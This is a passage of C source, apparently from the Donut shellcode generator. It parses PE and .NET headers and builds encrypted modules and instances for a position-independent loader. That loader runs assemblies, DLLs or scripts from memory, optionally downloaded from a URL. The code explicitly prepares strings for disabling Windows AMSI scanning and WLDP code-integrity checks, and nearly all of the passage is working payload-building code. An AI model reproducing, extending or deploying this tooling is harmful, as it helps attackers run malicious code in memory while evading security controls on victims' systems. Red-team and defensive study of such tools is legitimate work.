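        // VirtualAddress + SizeOfRawData, which is 32-bit arithmetic
        // that a crafted header could make wrap and pass the check.
        if (rva >= sh[i].VirtualAddress &&
            rva - sh[i].VirtualAddress < sh[i].SizeOfRawData) {
            // Widen before adding so the offset itself cannot wrap.
            return (ULONG64)sh[i].PointerToRawData +
                   (ULONG64)(rva - sh[i].VirtualAddress);
        }
    }
    return (ULONG64)-1;
}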
216 | ||
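// Open a file read-only and map it into memory.
//
// path : file to map.
// fi   : receives the descriptor (fi->fd), mapping (fi->map) and size
//        (fi->size). On failure no descriptor is left open and fi->map is
//        never left pointing at a failed mapping.
//
// Returns DONUT_ERROR_SUCCESS, or DONUT_ERROR_FILE_NOT_FOUND (stat failed),
// DONUT_ERROR_FILE_EMPTY, DONUT_ERROR_FILE_ACCESS (open failed),
// DONUT_ERROR_FILE_INVALID (not a regular file) or DONUT_ERROR_NO_MEMORY
// (mmap failed).
static int map_file(const char *path, file_info *fi) {
    struct stat fs;

    DPRINT("Reading size of file : %s", path);
    if(stat(path, &fs) != 0) {
        return DONUT_ERROR_FILE_NOT_FOUND;
    }

    if(fs.st_size == 0) {
        return DONUT_ERROR_FILE_EMPTY;
    }

    DPRINT("Opening %s", path);
    fi->fd = open(path, O_RDONLY);

    if(fi->fd < 0) {
        return DONUT_ERROR_FILE_ACCESS;
    }

    // Re-read the attributes through the descriptor we actually opened, so
    // the length we map belongs to this file and not to whatever stat()
    // saw a moment earlier. Reject anything that is not a regular file:
    // a directory opens fine with O_RDONLY but cannot be mapped.
    if(fstat(fi->fd, &fs) != 0 || !S_ISREG(fs.st_mode)) {
        close(fi->fd);
        fi->fd = -1;
        return DONUT_ERROR_FILE_INVALID;
    }
    if(fs.st_size == 0) {
        close(fi->fd);
        fi->fd = -1;
        return DONUT_ERROR_FILE_EMPTY;
    }

    fi->size = fs.st_size;

    // map into memory
    DPRINT("Mapping %" PRIi64 " bytes for %s", fi->size, path);
    fi->map = mmap(NULL, (size_t)fi->size,
        PROT_READ, MAP_PRIVATE, fi->fd, 0);

    // mmap() signals failure with MAP_FAILED, not NULL. Testing for NULL
    // here would let callers go on to dereference (void*)-1.
    if(fi->map == MAP_FAILED) {
        close(fi->fd);
        fi->fd  = -1;
        fi->map = NULL;
        return DONUT_ERROR_NO_MEMORY;
    }
    return DONUT_ERROR_SUCCESS;
}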
252 | ||
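// Release the mapping and descriptor acquired by map_file().
//
// Safe on a file_info that was never mapped, or that has already been
// released: only a live mapping is unmapped, and the descriptor is closed
// only when a mapping was established (map_file() closes it itself when
// mmap fails). Both fields are reset so a second call is a no-op instead
// of a double munmap/close.
//
// Returns 0 if fi is NULL, otherwise 1.
static int unmap_file(file_info *fi) {

    if(fi == NULL) return 0;

    if(fi->map != NULL && fi->map != MAP_FAILED) {
        DPRINT("Unmapping");
        munmap(fi->map, fi->size);
    }

    // fi->map == NULL means map_file() never got as far as a mapping, in
    // which case fd is either closed already or the zero from memset()
    // (which must not be mistaken for an open descriptor).
    if(fi->map != NULL && fi->fd >= 0) {
        DPRINT("Closing");
        close(fi->fd);
    }
    fi->map = NULL;
    fi->fd  = -1;

    return 1;
}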
266 | ||
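// Bounds helper for get_file_info(): true when [ofs, ofs + len) lies
// entirely inside the mapped file. Written so ofs + len cannot wrap.
static int span_in_map(const file_info *fi, uint64_t ofs, uint64_t len) {
    uint64_t size = (uint64_t)fi->size;
    return ofs <= size && len <= size - ofs;
}

// Classify a file by extension, map it into memory and, for PE images,
// extract what the loader needs: CPU architecture, whether it is a .NET
// assembly, and the CLR runtime version string from the metadata header.
//
// path : file to inspect. The extension (case-insensitive .vbs/.js/.xsl/
//        .exe/.dll) decides the module type.
// fi   : filled in on success (type, arch, ver plus the mapping from
//        map_file()). Zeroed first so every field has a defined value.
//
// Returns DONUT_ERROR_SUCCESS with the file still mapped (the caller
// releases it with unmap_file()), or an error code with the file unmapped.
//
// Every offset taken from the PE headers is checked against the file size
// before it is dereferenced: the headers are untrusted input and a
// truncated or malformed image must yield DONUT_ERROR_FILE_INVALID, not an
// out-of-bounds read.
static int get_file_info(const char *path, file_info *fi) {
    PIMAGE_NT_HEADERS     nt;
    PIMAGE_DATA_DIRECTORY dir;
    PMDSTORAGESIGNATURE   pss;
    PIMAGE_COR20_HEADER   cor;
    DWORD                 dll, rva, cpu;
    ULONG64               ofs, nt_ofs, opt_ofs, sec_ofs, ver_ofs, ver_max, ver_len;
    PCHAR                 ext, ver;
    int                   err = DONUT_ERROR_SUCCESS;

    DPRINT("Entering.");

    // invalid parameters passed?
    if(path == NULL || fi == NULL) {
        return DONUT_ERROR_INVALID_PARAMETER;
    }
    // zero initialize file_info structure
    memset(fi, 0, sizeof(file_info));

    DPRINT("Checking extension of %s", path);
    ext = strrchr(path, '.');

    // no extension? exit
    if(ext == NULL) {
        return DONUT_ERROR_FILE_INVALID;
    }
    DPRINT("Extension is \"%s\"", ext);

    // Script types run on any architecture; PE types get theirs from the
    // file header further down.
    if (strcasecmp(ext, ".vbs") == 0) {
        DPRINT("Module is VBS");
        fi->type = DONUT_MODULE_VBS;
        fi->arch = DONUT_ARCH_ANY;
    } else if (strcasecmp(ext, ".js") == 0) {
        DPRINT("Module is JS");
        fi->type = DONUT_MODULE_JS;
        fi->arch = DONUT_ARCH_ANY;
    } else if (strcasecmp(ext, ".xsl") == 0) {
        DPRINT("Module is XSL");
        fi->type = DONUT_MODULE_XSL;
        fi->arch = DONUT_ARCH_ANY;
    } else if (strcasecmp(ext, ".exe") == 0) {
        DPRINT("Module is EXE");
        fi->type = DONUT_MODULE_EXE;
    } else if (strcasecmp(ext, ".dll") == 0) {
        DPRINT("Module is DLL");
        fi->type = DONUT_MODULE_DLL;
    } else {
        // unrecognized extension
        return DONUT_ERROR_FILE_INVALID;
    }

    DPRINT("Mapping %s into memory", path);

    err = map_file(path, fi);
    if(err != DONUT_ERROR_SUCCESS) return err;

    // Scripts need no further inspection.
    if(fi->type != DONUT_MODULE_DLL && fi->type != DONUT_MODULE_EXE) {
        goto cleanup;
    }

    DPRINT("Checking DOS header");

    if(!span_in_map(fi, 0, sizeof(IMAGE_DOS_HEADER)) || !valid_dos_hdr(fi->map)) {
        err = DONUT_ERROR_FILE_INVALID;
        goto cleanup;
    }

    DPRINT("Checking NT header");

    // e_lfanew is a signed 32-bit value supplied by the file.
    if(DosHdr(fi->map)->e_lfanew < 0) {
        err = DONUT_ERROR_FILE_INVALID;
        goto cleanup;
    }
    nt_ofs  = (ULONG64)DosHdr(fi->map)->e_lfanew;
    opt_ofs = nt_ofs + offsetof(IMAGE_NT_HEADERS, OptionalHeader);

    // Signature and file header must fit before either is read.
    if(!span_in_map(fi, nt_ofs, offsetof(IMAGE_NT_HEADERS, OptionalHeader)) ||
       !valid_nt_hdr(fi->map)) {
        err = DONUT_ERROR_FILE_INVALID;
        goto cleanup;
    }

    DPRINT("Checking characteristics");

    nt  = NtHdr(fi->map);
    dll = nt->FileHeader.Characteristics & IMAGE_FILE_DLL;
    cpu = is32(fi->map);

    // set the CPU architecture for file (anything that is not I386 is
    // treated as x64 here)
    fi->arch = cpu ? DONUT_ARCH_X86 : DONUT_ARCH_X64;

    DPRINT("Checking IMAGE_DATA_DIRECTORY");

    // The optional header (whose size depends on the architecture) and the
    // section table must both lie inside the file: Dirs() reads the former
    // and rva2ofs() walks the latter with no size information of its own.
    if(!span_in_map(fi, opt_ofs,
        cpu ? sizeof(IMAGE_OPTIONAL_HEADER32) : sizeof(IMAGE_OPTIONAL_HEADER64))) {
        err = DONUT_ERROR_FILE_INVALID;
        goto cleanup;
    }
    sec_ofs = opt_ofs + nt->FileHeader.SizeOfOptionalHeader;
    if(!span_in_map(fi, sec_ofs,
        (ULONG64)nt->FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER))) {
        err = DONUT_ERROR_FILE_INVALID;
        goto cleanup;
    }

    dir = Dirs(fi->map);
    rva = dir[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress;

    // No COM descriptor: plain unmanaged EXE/DLL, nothing more to read.
    if(rva == 0) {
        goto cleanup;
    }
    DPRINT("COM Directory found");

    // set type to EXE or DLL assembly
    fi->type = (dll) ? DONUT_MODULE_NET_DLL : DONUT_MODULE_NET_EXE;

    // Default runtime version, replaced below when the metadata header
    // carries one. DONUT_VER_LEN - 1 leaves the terminator memset() wrote.
    strncpy(fi->ver, "v4.0.30319", DONUT_VER_LEN - 1);

    // COR20 header
    ofs = rva2ofs(fi->map, rva);
    if(ofs == (ULONG64)-1 || !span_in_map(fi, ofs, sizeof(IMAGE_COR20_HEADER))) {
        goto cleanup;
    }
    cor = (PIMAGE_COR20_HEADER)((uint8_t*)fi->map + ofs);
    rva = cor->MetaData.VirtualAddress;
    if(rva == 0) {
        goto cleanup;
    }

    // metadata storage signature
    ofs = rva2ofs(fi->map, rva);
    if(ofs == (ULONG64)-1 || !span_in_map(fi, ofs, sizeof(*pss))) {
        goto cleanup;
    }
    pss = (PMDSTORAGESIGNATURE)((uint8_t*)fi->map + ofs);

    // The version string follows the fixed part of the signature and is
    // not guaranteed to be NUL-terminated inside the file. Copy at most the
    // bytes that exist in the mapping (and at most DONUT_VER_LEN - 1),
    // stopping at the first NUL; an empty string keeps the default above.
    ver     = (PCHAR)pss->pVersion;
    ver_ofs = (ULONG64)((uint8_t*)ver - (uint8_t*)fi->map);
    ver_max = (ULONG64)fi->size - ver_ofs;
    if(ver_max > DONUT_VER_LEN - 1) ver_max = DONUT_VER_LEN - 1;
    for(ver_len = 0; ver_len < ver_max && ver[ver_len] != 0; ver_len++) { }

    if(ver_len != 0) {
        // same footprint as strncpy(fi->ver, ..., DONUT_VER_LEN - 1)
        memset(fi->ver, 0, DONUT_VER_LEN - 1);
        memcpy(fi->ver, ver, (size_t)ver_len);
    }
    DPRINT("Runtime version : %s", fi->ver);

cleanup:
    if(err != DONUT_ERROR_SUCCESS) {
        unmap_file(fi);
    }
    DPRINT("Leaving.");
    return err;
}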
397 | ||
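// Check whether the mapped DLL exports a function with the given name.
//
// fi       : a file_info that passed get_file_info(), so the PE headers and
//            section table are known to lie inside the mapping.
// function : exported name to look for (exact, case-sensitive match).
//
// Returns 1 if found, 0 otherwise. The export-directory offsets and the
// name strings come from the file and are checked against fi->size before
// use; a malformed or truncated export table simply yields "not found".
static int is_dll_export(file_info *fi, const char *function) {
    PIMAGE_DATA_DIRECTORY   dir;
    PIMAGE_EXPORT_DIRECTORY exp;
    DWORD                   rva, cnt, i;
    ULONG64                 ofs, size, remain;
    PDWORD                  sym;
    PCHAR                   str;
    uint8_t                 *map;
    int                     found = 0;

    DPRINT("Entering.");

    map  = (uint8_t*)fi->map;
    size = (ULONG64)fi->size;

    dir = Dirs(fi->map);
    rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    DPRINT("EAT VA : %" PRIx32, (uint32_t)rva);
    if(rva == 0) goto done;

    // the export directory itself must fit inside the file
    ofs = rva2ofs(fi->map, rva);
    if(ofs == (ULONG64)-1 || ofs > size ||
       size - ofs < sizeof(IMAGE_EXPORT_DIRECTORY)) goto done;

    exp = (PIMAGE_EXPORT_DIRECTORY)(map + ofs);
    cnt = exp->NumberOfNames;
    DPRINT("Number of exported functions : %" PRIx32, (uint32_t)cnt);
    if(cnt == 0) goto done;

    // the name-pointer array holds cnt RVAs; all of them must be in range
    ofs = rva2ofs(fi->map, exp->AddressOfNames);
    if(ofs == (ULONG64)-1 || ofs > size ||
       size - ofs < (ULONG64)cnt * sizeof(DWORD)) goto done;

    sym = (PDWORD)(map + ofs);

    // scan array for symbol
    for(i = 0; i < cnt && !found; i++) {
        ofs = rva2ofs(fi->map, sym[i]);
        if(ofs == (ULONG64)-1 || ofs >= size) continue;

        str    = (PCHAR)(map + ofs);
        remain = size - ofs;

        // the name must be NUL-terminated inside the file before it is
        // printed or compared, otherwise strcmp() would run off the mapping
        if(memchr(str, 0, (size_t)remain) == NULL) continue;

        DPRINT("Checking %s", str);
        if(strcmp(str, function) == 0) {
            DPRINT("Found API");
            found = 1;
        }
    }
done:
    DPRINT("Leaving.");
    return found;
}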
440 | ||
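// Fill buf with len bytes of cryptographically strong random data.
//
// Windows : CryptGenRandom through a verify-only context (no key container
//           is created). len is passed as a DWORD; callers only request
//           key, IV and short-name sizes.
// Other   : read from /dev/urandom, looping until len bytes have arrived
//           or read() reports end-of-file/error.
//
// Returns 1 on success, 0 on failure. On failure buf may be partially
// written and must not be used as key material.
static int CreateRandom(void *buf, uint64_t len) {

#if defined(WINDOWS)
    HCRYPTPROV prov;
    int ok;

    // 1. acquire crypto context
    if(!CryptAcquireContext(
        &prov, NULL, NULL,
        PROV_RSA_AES,
        CRYPT_VERIFYCONTEXT | CRYPT_SILENT)) return 0;

    ok = (int)CryptGenRandom(prov, (DWORD)len, buf);
    CryptReleaseContext(prov, 0);

    return ok;
#else
    int      fd;
    uint64_t r = 0;
    uint8_t  *p = (uint8_t*)buf;
    ssize_t  n;

    DPRINT("Opening /dev/urandom to acquire %" PRIu64 " bytes", len);
    fd = open("/dev/urandom", O_RDONLY);

    // 0 is a valid descriptor; only a negative value means open() failed
    if(fd >= 0) {
        while(r < len) {
            n = read(fd, p + r, (size_t)(len - r));
            // EOF or error: stop and let the length check below report it
            if(n <= 0) break;
            r += (uint64_t)n;
        }
        close(fd);
    }
    DPRINT("Acquired %" PRIu64 " of %" PRIu64 " bytes requested", r, len);
    return r == len;
#endif
}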
476 | ||
// Generate a random string of len characters (plus NUL terminator) into
// output, drawn from a 16-symbol alphabet chosen to avoid visually
// ambiguous characters (table from https://stackoverflow.com/a/27459196).
// len must be between 1 and DONUT_MAX_NAME - 1 inclusive.
// Returns 1 on success, 0 on a bad length or when no random bytes could be
// obtained.
static int GenRandomString(void *output, uint64_t len) {
    static const char alphabet[] = "HMN34P67R9TWCXYF";
    uint8_t  rnd[DONUT_MAX_NAME];
    char     *dst = (char*)output;
    uint64_t pos;

    if(len == 0 || len > (DONUT_MAX_NAME - 1)) return 0;

    // one random byte per output character; the whole buffer is requested
    if(!CreateRandom(rnd, DONUT_MAX_NAME)) return 0;

    // 16 symbols divide 256 evenly, so the modulo introduces no bias
    for(pos = 0; pos < len; pos++) {
        dst[pos] = alphabet[rnd[pos] % (sizeof(alphabet) - 1)];
    }
    dst[len] = 0;
    return 1;
}
497 | ||
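// Convert a NUL-terminated UTF-8 string to UTF-16 code units.
//
// dst : buffer of uint16_t with room for at least strlen(src) units; the
//       conversion never emits more units than it consumes bytes. No
//       terminator is written: callers rely on zero-initialised destination
//       memory (see the calloc() calls in CreateModule()/CreateInstance()).
// src : UTF-8 input. ASCII passes through unchanged. Code points above
//       U+FFFF become surrogate pairs. Malformed input (invalid lead or
//       continuation byte, overlong form, encoded surrogate, value past
//       U+10FFFF) becomes U+FFFD and consumes one byte.
//
// Returns the number of UTF-16 units written.
static uint64_t utf8_to_utf16(void* dst, const char* src) {
    uint16_t      *out = (uint16_t*)dst;
    const uint8_t *in  = (const uint8_t*)src;
    uint64_t       i   = 0;
    uint64_t       n   = 0;

    while(in[i] != 0) {
        uint8_t  b    = in[i];
        uint32_t cp   = 0xFFFD;   // replacement character on any error
        uint32_t min  = 0;        // smallest code point valid for this length
        uint64_t need = 0;        // continuation bytes expected
        uint64_t k;
        int      ok   = 1;

        if(b < 0x80) {
            cp = b;
        } else if((b & 0xE0) == 0xC0) {
            cp = b & 0x1F; need = 1; min = 0x80;
        } else if((b & 0xF0) == 0xE0) {
            cp = b & 0x0F; need = 2; min = 0x800;
        } else if((b & 0xF8) == 0xF0) {
            cp = b & 0x07; need = 3; min = 0x10000;
        } else {
            ok = 0;               // stray continuation or invalid lead byte
        }

        // A NUL in this position fails the 10xxxxxx test, so the loop
        // never reads past the terminator.
        for(k = 1; ok && k <= need; k++) {
            uint8_t c = in[i + k];
            if((c & 0xC0) != 0x80) { ok = 0; break; }
            cp = (cp << 6) | (c & 0x3F);
        }
        if(ok && need > 0 &&
           (cp < min || cp > 0x10FFFF || (cp >= 0xD800 && cp <= 0xDFFF))) {
            ok = 0;
        }

        if(!ok) {
            cp = 0xFFFD;
            i += 1;
        } else {
            i += need + 1;
        }

        if(cp >= 0x10000) {
            cp -= 0x10000;
            out[n++] = (uint16_t)(0xD800 | (cp >> 10));
            out[n++] = (uint16_t)(0xDC00 | (cp & 0x3FF));
        } else {
            out[n++] = (uint16_t)cp;
        }
    }
    return n;
}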
508 | ||
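// Build the DONUT_MODULE for the configured file: module type, the .NET
// domain/class/method/runtime strings or the unmanaged DLL entry name,
// the parameter list, and a copy of the file contents after the header.
//
// c  : configuration. On success c->mod points at the new module (owned by
//      the caller, released by DonutDelete()) and c->mod_len is its size.
//      c->domain and c->runtime are filled in when the caller left them
//      empty (random domain; runtime version taken from the assembly).
// fi : mapped file from get_file_info().
//
// Returns DONUT_ERROR_SUCCESS, DONUT_ERROR_NO_MEMORY, DONUT_ERROR_RANDOM,
// or DONUT_ERROR_INVALID_PARAMETER when a single parameter is longer than
// DONUT_MAX_NAME - 1. On error nothing is left allocated and c->mod is
// NULL.
static int CreateModule(PDONUT_CONFIG c, file_info *fi) {
    PDONUT_MODULE mod = NULL;
    uint64_t len = 0;
    char *param, parambuf[DONUT_MAX_NAME*DONUT_MAX_PARAM+DONUT_MAX_PARAM];
    int cnt, err=DONUT_ERROR_SUCCESS;

    DPRINT("Entering.");

    // Allocate memory for module information and contents of file
    len = sizeof(DONUT_MODULE) + fi->size;
    DPRINT("Allocating %" PRIi64 " bytes of memory for DONUT_MODULE", len);
    // zero-initialised: utf8_to_utf16() writes no terminator and relies on
    // the destination already being zero
    mod = calloc(len, 1);

    // Memory not allocated? exit
    if(mod == NULL) {
        return DONUT_ERROR_NO_MEMORY;
    }

    // Set the type of module
    mod->type = fi->type;

    // DotNet assembly?
    if(mod->type == DONUT_MODULE_NET_DLL ||
       mod->type == DONUT_MODULE_NET_EXE)
    {
        // If no domain name specified, generate a random one
        if(c->domain[0] == 0) {
            if(!GenRandomString(c->domain, DONUT_DOMAIN_LEN)) {
                err = DONUT_ERROR_RANDOM;
                goto cleanup;
            }
        }
        // convert to unicode format.
        // wchar_t is 32-bits on linux, but 16-bit on windows. :-|
        DPRINT("Domain : %s", c->domain);
        utf8_to_utf16(mod->domain, c->domain);

        // Assembly is DLL? Copy the class and method
        if(mod->type == DONUT_MODULE_NET_DLL) {
            DPRINT("Class : %s", c->cls);
            utf8_to_utf16(mod->cls, c->cls);

            DPRINT("Method : %s", c->method);
            utf8_to_utf16(mod->method, c->method);
        }
        // If no runtime specified in configuration, use version from assembly
        if(c->runtime[0] == 0) {
            strncpy(c->runtime, fi->ver, DONUT_MAX_NAME-1);
        }
        DPRINT("Runtime : %s", c->runtime);
        utf8_to_utf16(mod->runtime, c->runtime);
    } else
    // Unmanaged DLL? check for exported api
    if(mod->type == DONUT_MODULE_DLL &&
       c->method[0] != 0)
    {
        DPRINT("DLL function : %s", c->method);
        strncpy((char*)mod->method, c->method, DONUT_MAX_NAME-1);
    }

    // Parameters specified?
    if(c->param[0] != 0) {
        // strncpy() leaves the copy unterminated when the source fills the
        // buffer, and parambuf is an uninitialised automatic; terminate it
        // explicitly so strtok() cannot run past the end.
        strncpy(parambuf, c->param, sizeof(parambuf)-1);
        parambuf[sizeof(parambuf)-1] = 0;
        cnt = 0;
        // Split by comma or semi-colon (strtok keeps static state, so this
        // function is not reentrant)
        param = strtok(parambuf, ",;");

        while(param != NULL && cnt < DONUT_MAX_PARAM) {
            if(strlen(param) >= DONUT_MAX_NAME) {
                DPRINT("Parameter : \"%s\" exceeds DONUT_MAX_NAME(%i)",
                    param, DONUT_MAX_NAME);
                err = DONUT_ERROR_INVALID_PARAMETER;
                goto cleanup;
            }
            DPRINT("Adding \"%s\"", param);
            // convert ansi string to wide character string
            utf8_to_utf16(mod->param[cnt++], param);

            // get next parameter
            param = strtok(NULL, ",;");
        }
        // set number of parameters
        mod->param_cnt = cnt;
    }

    // set length of module data
    mod->len = fi->size;
    // read module into memory
    memcpy(&mod->data, fi->map, fi->size);
    // update configuration with pointer to module
    c->mod     = mod;
    c->mod_len = len;

cleanup:
    // if there was an error, free memory for module
    if(err != DONUT_ERROR_SUCCESS && mod != NULL) {
        free(mod);
        c->mod     = NULL;
        c->mod_len = 0;
    }
    DPRINT("Leaving.");
    return err;
}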
612 | ||
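// Build the DONUT_INSTANCE consumed by the loader stub: random keys and
// verification string, API hashes derived from api_imports[] with a fresh
// IV, the GUIDs and DLL names the module type needs, the download URL for
// DONUT_INSTANCE_URL, and (for DONUT_INSTANCE_PIC) a copy of the module.
//
// c  : configuration; c->mod/c->mod_len must already be set by
//      CreateModule(). On success c->inst/c->inst_len receive the instance
//      (owned by the caller, released by DonutDelete()). For URL instances
//      the module in c->mod is encrypted in place and c->modname is
//      generated.
// fi : unused by this function; kept for signature parity with
//      CreateModule().
//
// Returns DONUT_ERROR_SUCCESS, DONUT_ERROR_NO_MEMORY or DONUT_ERROR_RANDOM.
// Every failure path frees the instance allocation; the early returns that
// previously leaked it now route through cleanup.
static int CreateInstance(PDONUT_CONFIG c, file_info *fi) {
    DONUT_CRYPT     inst_key, mod_key;
    PDONUT_INSTANCE inst;
    uint64_t        inst_len;
    uint64_t        dll_hash;
    int             cnt;
    int             err = DONUT_ERROR_SUCCESS;

    DPRINT("Entering.");

    // Allocate memory for the size of instance based on the type
    DPRINT("Allocating space for instance");
    inst_len = sizeof(DONUT_INSTANCE);

    // if this is a PIC instance, add the size of module
    // that will be appended to the end of structure
    if(c->inst_type == DONUT_INSTANCE_PIC) {
        DPRINT("The size of module is %" PRIi64 " bytes. "
               "Adding to size of instance.", c->mod_len);
        inst_len += c->mod_len;
    }
    // allocate zero-initialized memory for instance
    inst = (PDONUT_INSTANCE)calloc(inst_len, 1);

    // Memory allocation failed? exit
    if(inst == NULL) {
        return DONUT_ERROR_NO_MEMORY;
    }

#if !defined(NOCRYPTO)
    DPRINT("Generating random key for instance");
    if(!CreateRandom(&inst_key, sizeof(DONUT_CRYPT))) {
        err = DONUT_ERROR_RANDOM;
        goto cleanup;
    }
    memcpy(&inst->key, &inst_key, sizeof(DONUT_CRYPT));

    DPRINT("Generating random key for module");
    if(!CreateRandom(&mod_key, sizeof(DONUT_CRYPT))) {
        err = DONUT_ERROR_RANDOM;
        goto cleanup;
    }
    memcpy(&inst->mod_key, &mod_key, sizeof(DONUT_CRYPT));

    DPRINT("Generating random string to verify decryption");
    if(!GenRandomString(inst->sig, DONUT_SIG_LEN)) {
        err = DONUT_ERROR_RANDOM;
        goto cleanup;
    }
#endif

    DPRINT("Generating random IV for Maru hash");
    if(!CreateRandom(&inst->iv, MARU_IV_LEN)) {
        err = DONUT_ERROR_RANDOM;
        goto cleanup;
    }

    DPRINT("Generating hashes for API using IV: %" PRIx64, inst->iv);

    for(cnt=0; api_imports[cnt].module != NULL; cnt++) {
        // calculate hash for DLL string
        dll_hash = maru(api_imports[cnt].module, inst->iv);

        // calculate hash for API string.
        // xor with DLL hash and store in instance
        inst->api.hash[cnt] = maru(api_imports[cnt].name, inst->iv) ^ dll_hash;

        DPRINT("Hash for %-15s : %-22s = %" PRIX64,
            api_imports[cnt].module,
            api_imports[cnt].name,
            inst->api.hash[cnt]);
    }
    // save how many API to resolve
    inst->api_cnt = cnt;
    inst->dll_cnt = 0;

    strcpy(inst->dll_name[inst->dll_cnt++], "ole32.dll");
    strcpy(inst->dll_name[inst->dll_cnt++], "oleaut32.dll");
    strcpy(inst->dll_name[inst->dll_cnt++], "wininet.dll");
    strcpy(inst->dll_name[inst->dll_cnt++], "mscoree.dll");

    // if module is .NET assembly
    if(c->mod_type == DONUT_MODULE_NET_DLL ||
       c->mod_type == DONUT_MODULE_NET_EXE)
    {
        DPRINT("Copying GUID structures and DLL strings for loading .NET assemblies");

        memcpy(&inst->xIID_AppDomain,        &xIID_AppDomain,        sizeof(GUID));
        memcpy(&inst->xIID_ICLRMetaHost,     &xIID_ICLRMetaHost,     sizeof(GUID));
        memcpy(&inst->xCLSID_CLRMetaHost,    &xCLSID_CLRMetaHost,    sizeof(GUID));
        memcpy(&inst->xIID_ICLRRuntimeInfo,  &xIID_ICLRRuntimeInfo,  sizeof(GUID));
        memcpy(&inst->xIID_ICorRuntimeHost,  &xIID_ICorRuntimeHost,  sizeof(GUID));
        memcpy(&inst->xCLSID_CorRuntimeHost, &xCLSID_CorRuntimeHost, sizeof(GUID));
    } else
    // if module is VBS or JS
    if(c->mod_type == DONUT_MODULE_VBS ||
       c->mod_type == DONUT_MODULE_JS)
    {
        DPRINT("Copying GUID structures and DLL strings for loading VBS/JS");

        memcpy(&inst->xIID_IUnknown,              &xIID_IUnknown,              sizeof(GUID));
        memcpy(&inst->xIID_IDispatch,             &xIID_IDispatch,             sizeof(GUID));
        memcpy(&inst->xIID_IHost,                 &xIID_IHost,                 sizeof(GUID));
        memcpy(&inst->xIID_IActiveScript,         &xIID_IActiveScript,         sizeof(GUID));
        memcpy(&inst->xIID_IActiveScriptSite,     &xIID_IActiveScriptSite,     sizeof(GUID));
        memcpy(&inst->xIID_IActiveScriptParse32,  &xIID_IActiveScriptParse32,  sizeof(GUID));
        memcpy(&inst->xIID_IActiveScriptParse64,  &xIID_IActiveScriptParse64,  sizeof(GUID));

        utf8_to_utf16(inst->wscript,     "WScript");
        utf8_to_utf16(inst->wscript_exe, "wscript.exe");

        if(c->mod_type == DONUT_MODULE_VBS) {
            memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_VBScript, sizeof(GUID));
        } else {
            memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_JScript, sizeof(GUID));
        }
    } else
    // if module is XSL
    if(c->mod_type == DONUT_MODULE_XSL)
    {
        DPRINT("Copying GUID structures for loading XSL to instance");

        memcpy(&inst->xCLSID_DOMDocument30, &xCLSID_DOMDocument30, sizeof(GUID));
        memcpy(&inst->xIID_IXMLDOMDocument, &xIID_IXMLDOMDocument, sizeof(GUID));
        memcpy(&inst->xIID_IXMLDOMNode,     &xIID_IXMLDOMNode,     sizeof(GUID));
    }

    // required to disable AMSI
    strcpy(inst->amsi.s,      "AMSI");
    strcpy(inst->amsiInit,    "AmsiInitialize");
    strcpy(inst->amsiScanBuf, "AmsiScanBuffer");
    strcpy(inst->amsiScanStr, "AmsiScanString");

    strcpy(inst->clr,         "CLR");

    // required to disable WLDP
    strcpy(inst->wldp,           "WLDP");
    strcpy(inst->wldpQuery,      "WldpQueryDynamicCodeTrust");
    strcpy(inst->wldpIsApproved, "WldpIsClassInApprovedList");

    // set the type of instance we're creating
    inst->type = c->inst_type;

    // if the module will be downloaded
    // set the URL parameter and request verb
    if(inst->type == DONUT_INSTANCE_URL) {
        // generate a random name for module
        // that will be saved to disk
        if(!GenRandomString(c->modname, DONUT_MAX_MODNAME)) {
            err = DONUT_ERROR_RANDOM;
            goto cleanup;
        }
        DPRINT("Generated random name for module : %s", c->modname);

        DPRINT("Setting URL parameters");
        // DonutCreate() has already checked url + modname fit DONUT_MAX_URL
        strcpy(inst->http.url, c->url);
        // append module name
        strcat(inst->http.url, c->modname);
        // set the request verb
        strcpy(inst->http.req, "GET");

        DPRINT("Payload will attempt download from : %s", inst->http.url);
    }

    inst->mod_len = c->mod_len;
    inst->len     = inst_len;
    c->inst       = inst;
    c->inst_len   = inst_len;

#if !defined(NOCRYPTO)
    if(c->inst_type == DONUT_INSTANCE_URL) {
        DPRINT("encrypting module for download");

        c->mod->mac = maru(inst->sig, inst->iv);

        donut_encrypt(
            mod_key.mk,
            mod_key.ctr,
            c->mod,
            c->mod_len);
    }
#endif
    // if PIC, copy module to instance
    if(inst->type == DONUT_INSTANCE_PIC) {
        DPRINT("Copying module data to instance");
        memcpy(&c->inst->module.x, c->mod, c->mod_len);
    }

#if !defined(NOCRYPTO)
    DPRINT("encrypting instance");

    inst->mac = maru(inst->sig, inst->iv);

    // everything from api_cnt onwards is encrypted; the fields before it
    // (including the key material the loader needs) stay in the clear
    uint8_t *inst_data = (uint8_t*)inst + offsetof(DONUT_INSTANCE, api_cnt);

    donut_encrypt(
        inst_key.mk,
        inst_key.ctr,
        inst_data,
        c->inst_len - offsetof(DONUT_INSTANCE, api_cnt));
#endif

cleanup:
    // on error the instance was never handed to c->inst, so free it here
    if(err != DONUT_ERROR_SUCCESS) {
        free(inst);
    }
    DPRINT("Leaving.");

    return err;
}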
812 | ||
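// Given a configuration, build a position-independent payload that loads
// and runs the configured file from memory.
//
// c : configuration filled in by the caller. c->file must name the input;
//     c->inst_type, c->arch and c->bypass are validated first. For
//     DONUT_INSTANCE_URL, c->url must start with http:// or https:// and
//     leave room for the module name in DONUT_MAX_URL (a trailing '/' is
//     appended when missing, and the module is written to disk under
//     c->modname). On success c->mod, c->inst and c->pic (with their *_len
//     fields) are allocated and owned by the caller until DonutDelete().
//
// Returns DONUT_ERROR_SUCCESS or a DONUT_ERROR_* code. On any error every
// allocation made here is released through DonutDelete() and the input
// file is unmapped.
EXPORT_FUNC
int DonutCreate(PDONUT_CONFIG c) {
    uint8_t   *pl;
    int       url_len, err = DONUT_ERROR_SUCCESS;
    FILE      *fd;
    file_info fi;

    DPRINT("Entering.");

    DPRINT("Validating configuration and path of file PDONUT_CONFIG: %p", c);

    if(c == NULL || c->file[0] == 0) {
        return DONUT_ERROR_INVALID_PARAMETER;
    }

    c->mod      = NULL;
    c->mod_len  = 0;

    c->inst     = NULL;
    c->inst_len = 0;

    c->pic      = NULL;
    c->pic_len  = 0;

    // instance not specified?
    DPRINT("Validating instance type %" PRIx32 "", c->inst_type);

    if(c->inst_type != DONUT_INSTANCE_PIC &&
       c->inst_type != DONUT_INSTANCE_URL) {

        return DONUT_ERROR_INVALID_PARAMETER;
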